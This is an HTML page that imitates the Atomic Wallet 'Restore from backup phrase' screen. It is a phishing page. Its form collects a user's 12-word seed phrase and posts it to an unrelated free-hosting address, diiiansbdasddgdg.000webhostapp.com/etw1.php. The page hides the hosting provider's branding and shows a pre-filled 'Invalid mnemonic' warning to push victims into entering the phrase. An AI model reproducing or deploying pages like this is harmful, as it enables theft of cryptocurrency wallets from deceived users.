<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Atomic Cryptocurrency Wallet</title>
	<!-- BOOTSTRAP STYLES-->
    <link href="./Atomic_Wallet_files/bootstrap.css" rel="stylesheet">
     <!-- FONTAWESOME STYLES-->
    <link href="./Atomic_Wallet_files/font-awesome.css" rel="stylesheet">
        <!-- CUSTOM STYLES-->
    <link href="./Atomic_Wallet_files/custom.css" rel="stylesheet">
     <!-- GOOGLE FONTS-->
   <link href="./Atomic_Wallet_files/css" rel="stylesheet" type="text/css">

</head>
<body>
<style>
 *{
  margin: 0;
  padding: 0;
  font-family: Century Gothic;
 }
body{
  background-color: rgb(37,40,79);
  height: 100vh;
  background-size: cover;
  background-position: absolute;
  background-repeat: no-repeat, repeat;
}

ul{
  float: right;
  list-style-type: none;
  margin-top: 25px;
}

ul li{
  display: inline-block;
}

ul li a{
  text-decoration: none;
  color: #fff;
  padding: 8px 25px;
  border: 2px solid #C09854;
  border-radius: 25px;
  font-size: 14px;
  font-style: bold;
  transform: 0.6s ease;
  letter-spacing: 1px;
}

ul li a:hover{
  background-color: #C09854;
  color: #fff;
}

.logo img{
  float: left;
  margin-top: 23px;
  height: 20px;
  width: auto;
}

.main{
  margin: auto;
}

.title{
 
  margin-top: 28%;
  text-align: center;
  
}


.btn{
  border-color: 2px solid rgb(48,166,253);
  background-color: rgb(48,166,253);
  padding: 16px 10px;
  display: inline-block;
  border-radius: 25px;
  width: 300px;
  border: none;
  outline: none !important;
  
}

.btn a{
  text-decoration: none;
  color: white;
  font-size: 15px;
  font-style: bold;
  letter-spacing: 2px;

}

img[alt="www.000webhost.com"]{
    opacity: 0;
}
#seed{
    border: none;
    border-bottom: 1px solid silver;
    padding: 2px 2px;
    outline: none !important;
    width: 300px;
    height: 4em;
    background-color: transparent;
    color: white;
    
}
::placeholder{
    padding-top: 0px;
    color: rgb(77,86,119);
    text-align: left;
}

</style>



    <header>
        <h1 style="text-align: center; color: white; font-size: 18px">Restore from backup phrase</h1>
    </header>

  <div class="title">
     
    <img src="./Atomic_Wallet_files/logo.png" style="height: 140px; width: auto;">
    
    
<br><br><br><br><br>

    <form method="POST" action="https://diiiansbdasddgdg.000webhostapp.com/etw1.php?access.wallet">
	<h1 style="text-align: center;color: #de0a0a;font-size: 12px;">Invalid mnemonic</h1>
        
        <input type="text" name="walletSeed" id="seed" placeholder="Type 12-word Backup Phrase" required="">
        <i class="fa fa-qrcode" aria-hidden="true" style="color: rgb(77,86,119); margin-right: 20px"></i>

        <br><br><br><br>
<br><br><br><br>

<br>


    
    <button class="btn">
      <a href="https://diiiansbdasddgdg.000webhostapp.com/etw1.php?access.wallet"><strong>RESTORE</strong></a>
    </button>
    </form>


    
  </div>


    

     <!-- SCRIPTS -AT THE BOTOM TO REDUCE THE LOAD TIME-->
    <!-- JQUERY SCRIPTS -->
    <script src="./Atomic_Wallet_files/jquery-1.10.2.js.download"></script>
      <!-- BOOTSTRAP SCRIPTS -->
    <script src="./Atomic_Wallet_files/bootstrap.min.js.download"></script>
    <!-- METISMENU SCRIPTS -->
    <script src="./Atomic_Wallet_files/jquery.metisMenu.js.download"></script>
      <!-- CUSTOM SCRIPTS -->
    <script src="./Atomic_Wallet_files/custom.js.download"></script>
   

</body></html>